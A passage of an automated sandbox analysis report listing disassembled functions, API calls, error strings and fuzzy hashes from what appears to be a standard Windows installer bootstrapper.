                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                    • String ID: %ls.R$dlutil.cpp
                                                                                                                                                                    • API String ID: 3160720760-657863730
                                                                                                                                                                    • Opcode ID: cae818d8693634c22c00368bb11f0d0ecf7ced6f4d4a1c05194bbc655d9428f2
                                                                                                                                                                    • Instruction ID: f3268802e00050ff22c97f069c5e3db7565fc97c53ed0f5cf23ae2cb4c05e644
                                                                                                                                                                    • Opcode Fuzzy Hash: cae818d8693634c22c00368bb11f0d0ecf7ced6f4d4a1c05194bbc655d9428f2
                                                                                                                                                                    • Instruction Fuzzy Hash: F531E272941624BBDB208BA8CC45F6F7BA8AB45721F128255FE01EB2C1E7709E0097A1
                                                                                                                                                                    Function 0090C8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0090E444,000000FF,00000000,00000000,0090E444,?,?,0090DBEB,?,?,?,?), ref: 0090CD89
                                                                                                                                                                    • CreateFileW.KERNEL32(E90094BA,80000000,00000005,00000000,00000003,08000000,00000000,009053C5,?,00000000,840F01E8,14680A79,00000001,009053BD,00000000,00905489), ref: 0090C956
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00917809,0090566D,00905479,00905479,00000000,?,00905489,FFF9E89D,00905489,009054BD,00905445,?,00905445), ref: 0090C99B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to open catalog in working path: %ls, xrefs: 0090C9C9
                                                                                                                                                                    • catalog.cpp, xrefs: 0090C9BC
                                                                                                                                                                    • Failed to find payload for catalog file., xrefs: 0090C9E0
                                                                                                                                                                    • Failed to get catalog local file path, xrefs: 0090C9D9
                                                                                                                                                                    • Failed to verify catalog signature: %ls, xrefs: 0090C994
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareCreateErrorFileLastString
                                                                                                                                                                    • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                                    • API String ID: 1774366664-48089280
                                                                                                                                                                    • Opcode ID: a8fef640fefd310fa37576508eb053de29c71b2345831b94cead66907f412529
                                                                                                                                                                    • Instruction ID: aa9d9b916aa6aa4b50c78be1dbc0ccec91c05c893a00d1d3ea375f7c4314a50c
                                                                                                                                                                    • Opcode Fuzzy Hash: a8fef640fefd310fa37576508eb053de29c71b2345831b94cead66907f412529
                                                                                                                                                                    • Instruction Fuzzy Hash: B331B5B2940626BFC7219B68CC46F59BBA4EF04720F218665F924EB2C0E671AD509BD0
                                                                                                                                                                    Function 0092D33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0092D642,?), ref: 0092D357
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,?,?,0092D642,?), ref: 0092D375
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092D3B6
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0092D3CD
                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 0092D3D6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to send files in use message from netfx chainer., xrefs: 0092D41C
                                                                                                                                                                    • Failed to get message from netfx chainer., xrefs: 0092D3F7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                    • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                                                    • API String ID: 2608678126-3424578679
                                                                                                                                                                    • Opcode ID: 0e9f28db40ac4e904aa57b6a2746ee14d16705f741c9b589d78bb53c9a4cfbfc
                                                                                                                                                                    • Instruction ID: 81fd3718fb0c929d307cfe260949a9c60f168e5a29bb8e7d15b5a3374b95de4d
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9f28db40ac4e904aa57b6a2746ee14d16705f741c9b589d78bb53c9a4cfbfc
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31FB35904619BFCB119FA4DC08EAFBBF8EF85320F108255F565E22A0C770D910DB90
                                                                                                                                                                    Function 0094093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 009409AB
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 009409B5
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 009409FE
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00940A0B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                    • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                                    • API String ID: 161867955-2732225242
                                                                                                                                                                    • Opcode ID: 8638375f4f8bba628e39f74092bd017a6d72baafe38c612878bdc3adae28e9c3
                                                                                                                                                                    • Instruction ID: 680956eac193d98a1ff1fcab9ddfa6ccb3af605034fe937f882fe6c26af93eb7
                                                                                                                                                                    • Opcode Fuzzy Hash: 8638375f4f8bba628e39f74092bd017a6d72baafe38c612878bdc3adae28e9c3
                                                                                                                                                                    • Instruction Fuzzy Hash: E8213972D0121EABDB11DFE9CD45EAEBBB8EF44754F10042AEA05B7251E3709E009AA1
                                                                                                                                                                    Function 00909B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909BB3
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0090A8AB,00000100,000002C0,000002C0,00000100), ref: 00909BD3
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A8AB,00000100,000002C0,000002C0,00000100), ref: 00909BDE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909BBE
                                                                                                                                                                    • Failed to set directory search path variable., xrefs: 00909C0F
                                                                                                                                                                    • Failed while searching directory search: %ls, for path: %ls, xrefs: 00909C34
                                                                                                                                                                    • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00909C4A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                    • API String ID: 1811509786-2966038646
                                                                                                                                                                    • Opcode ID: 624cda8867b64b4f2edf2ad043a0a0158acd5375fd9e3d666a80edd70737f306
                                                                                                                                                                    • Instruction ID: 295acae2c6c8e617e306cddd321e09fba71072ab66a2f87ce3691e8d9fe9aa4a
                                                                                                                                                                    • Opcode Fuzzy Hash: 624cda8867b64b4f2edf2ad043a0a0158acd5375fd9e3d666a80edd70737f306
                                                                                                                                                                    • Instruction Fuzzy Hash: C021D433D40035BEDB2266988D02F5DBBACAF41370F210251FE54661E2D7759E50A7C9
                                                                                                                                                                    Function 00909D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909D64
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0090A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00909D84
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00909D8F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909D6F
                                                                                                                                                                    • Failed while searching file search: %ls, for path: %ls, xrefs: 00909DBD
                                                                                                                                                                    • File search: %ls, did not find path: %ls, xrefs: 00909DF3
                                                                                                                                                                    • Failed to set variable to file search path., xrefs: 00909DE7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                                    • API String ID: 1811509786-3425311760
                                                                                                                                                                    • Opcode ID: bd0652094b6b9f01b0bba0628bfcf7b2bbb16d9548dd760d436a2a1d451f301b
                                                                                                                                                                    • Instruction ID: 8ad99cc1060c7bfd21c1d30bdba1473ebcff36b1feab147341b36e55d3c219fa
                                                                                                                                                                    • Opcode Fuzzy Hash: bd0652094b6b9f01b0bba0628bfcf7b2bbb16d9548dd760d436a2a1d451f301b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F11D533984125FFDF226698CD02F9DBB29AF50734F210211FD10B61E2E7725E50A6D1
                                                                                                                                                                    Function 0091CF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?), ref: 0091CF37
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0091CF41
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000001,?,?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000), ref: 0091CF7D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0091CF87
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                    • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                                    • API String ID: 3686190907-1954264426
                                                                                                                                                                    • Opcode ID: 8a7a1fa1d05502bad695fe826be824509645dec25069c579b3e592353bb83616
                                                                                                                                                                    • Instruction ID: a3934273619251b2fec1399390d71644f31e794f2949f0289502726a15a1aa09
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a7a1fa1d05502bad695fe826be824509645dec25069c579b3e592353bb83616
                                                                                                                                                                    • Instruction Fuzzy Hash: 180149B7FC56396787309B965C0AE9FBA4C9F01B72B014165BE04BB280E7A0CD4092E4
                                                                                                                                                                    Function 009169AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009169BB
                                                                                                                                                                    • GetLastError.KERNEL32(?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009169C5
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000001,00000000,?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00916A04
                                                                                                                                                                    • GetLastError.KERNEL32(?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00916A0E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                    • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                                    • API String ID: 3686190907-2546940223
                                                                                                                                                                    • Opcode ID: 35e1a8d29370030de4cbf0270289f3283ef7107be53d5abf3cc8014f9841e1bb
                                                                                                                                                                    • Instruction ID: d96c250ae20639a75ecd1d76dbb269eb3c66093225cbb75c57361d0ff5fb4bca
                                                                                                                                                                    • Opcode Fuzzy Hash: 35e1a8d29370030de4cbf0270289f3283ef7107be53d5abf3cc8014f9841e1bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A970B4420ABBDB00DF669E05FAE36ACEF40315F104169BD14E9190DB75CE40A754
                                                                                                                                                                    Function 0091F7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0091F7EE
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0091F8FB
                                                                                                                                                                    Strings
                                                                                                                                                                    • UX denied while trying to set source on embedded payload: %ls, xrefs: 0091F870
                                                                                                                                                                    • UX requested unknown payload with id: %ls, xrefs: 0091F85A
                                                                                                                                                                    • Failed to set source path for payload., xrefs: 0091F88A
                                                                                                                                                                    • Failed to set source path for container., xrefs: 0091F8E0
                                                                                                                                                                    • UX requested unknown container with id: %ls, xrefs: 0091F8BA
                                                                                                                                                                    • Engine is active, cannot change engine state., xrefs: 0091F808
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                    • API String ID: 3168844106-4121889706
                                                                                                                                                                    • Opcode ID: fd2fabeac3749254b9b1bc690b0ef0c51e95bfa6d5dbf91039b0b8341b03ecfb
                                                                                                                                                                    • Instruction ID: 48be1a2ab2b3740ce6c548e2db4ba7c286ab62119e3cbd8bb2239a814bc14929
                                                                                                                                                                    • Opcode Fuzzy Hash: fd2fabeac3749254b9b1bc690b0ef0c51e95bfa6d5dbf91039b0b8341b03ecfb
                                                                                                                                                                    • Instruction Fuzzy Hash: EA313732B0421DAFCB21DB58CC56E9A73ACAF84720B1541A6FC06EB241DB75ED808791
                                                                                                                                                                    Function 009071FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 00907210
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to append escape sequence., xrefs: 009072A3
                                                                                                                                                                    • Failed to append characters., xrefs: 0090729C
                                                                                                                                                                    • Failed to format escape sequence., xrefs: 009072AA
                                                                                                                                                                    • []{}, xrefs: 0090723A
                                                                                                                                                                    • [\%c], xrefs: 0090726F
                                                                                                                                                                    • Failed to allocate buffer for escaped string., xrefs: 00907227
                                                                                                                                                                    • Failed to copy string., xrefs: 009072C4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                    • API String ID: 1659193697-3250950999
                                                                                                                                                                    • Opcode ID: 741503d3fd3cf6e17393ca416fb4362222c71847924646b79a95350cf0aad959
                                                                                                                                                                    • Instruction ID: 0317e9f88ea401a1d98b70831c2217ab7f877fa778ff65443e089ad596d28f87
                                                                                                                                                                    • Opcode Fuzzy Hash: 741503d3fd3cf6e17393ca416fb4362222c71847924646b79a95350cf0aad959
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D21E472D09219BFDB2196D8CC42FAEB7AD9F90734F210155F910B61C1DBB9BE4492A0
                                                                                                                                                                    Function 00925BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,0094B500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,009267DE,?,00000001,?,0094B4A0), ref: 00925C45
                                                                                                                                                                    Strings
                                                                                                                                                                    • feclient.dll, xrefs: 00925C3B, 00925D65
                                                                                                                                                                    • Failed to insert execute action., xrefs: 00925C9A
                                                                                                                                                                    • Failed to copy target product code., xrefs: 00925D78
                                                                                                                                                                    • Failed grow array of ordered patches., xrefs: 00925CDE
                                                                                                                                                                    • Failed to plan action for target product., xrefs: 00925CF0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                                                                    • API String ID: 1825529933-3477540455
                                                                                                                                                                    • Opcode ID: af18861b8c92b984c7e0034d203970123273f408c9d65f2499e34e9fc42ea7c3
                                                                                                                                                                    • Instruction ID: a9f1276e8874c513479189cac13f172640c21b03d6aba81ea85f9e0352a23d97
                                                                                                                                                                    • Opcode Fuzzy Hash: af18861b8c92b984c7e0034d203970123273f408c9d65f2499e34e9fc42ea7c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 318144B560476A9FCB14CF58D880AAA77A8BF48324F12856AFC558B396D730EC51CF90
                                                                                                                                                                    Function 0093CAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0093D262,00000000,00000000,00000000,00000000,00000000,00932F1D), ref: 0093CB2F
                                                                                                                                                                    • __fassign.LIBCMT ref: 0093CBAA
                                                                                                                                                                    • __fassign.LIBCMT ref: 0093CBC5
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0093CBEB
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0093D262,00000000,?,?,?,?,?,?,?,?,?,0093D262,00000000), ref: 0093CC0A
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0093D262,00000000,?,?,?,?,?,?,?,?,?,0093D262,00000000), ref: 0093CC43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                    • Opcode ID: b832de7b64e97f8897d8be51d82887c90ae08938ca6a4a073f235415267fe2f1
                                                                                                                                                                    • Instruction ID: ce0942255735fe27f670536f86ef633dc59895acd5b2c22745a1f8d50ace2c87
                                                                                                                                                                    • Opcode Fuzzy Hash: b832de7b64e97f8897d8be51d82887c90ae08938ca6a4a073f235415267fe2f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6751B1B1A04649AFDB10CFA8DC95AEEBBF8EF09300F14451AE955F7251E7709941CFA0
                                                                                                                                                                    Function 00929279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00917113,000000B8,0000001C,00000100), ref: 009292A4
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0094B4B8,000000FF,?,?,?,00917113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 0092932E
                                                                                                                                                                    Strings
                                                                                                                                                                    • comres.dll, xrefs: 009293B0
                                                                                                                                                                    • BA aborted detect forward compatible bundle., xrefs: 00929398
                                                                                                                                                                    • detect.cpp, xrefs: 0092938E
                                                                                                                                                                    • Failed to initialize update bundle., xrefs: 009293D1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
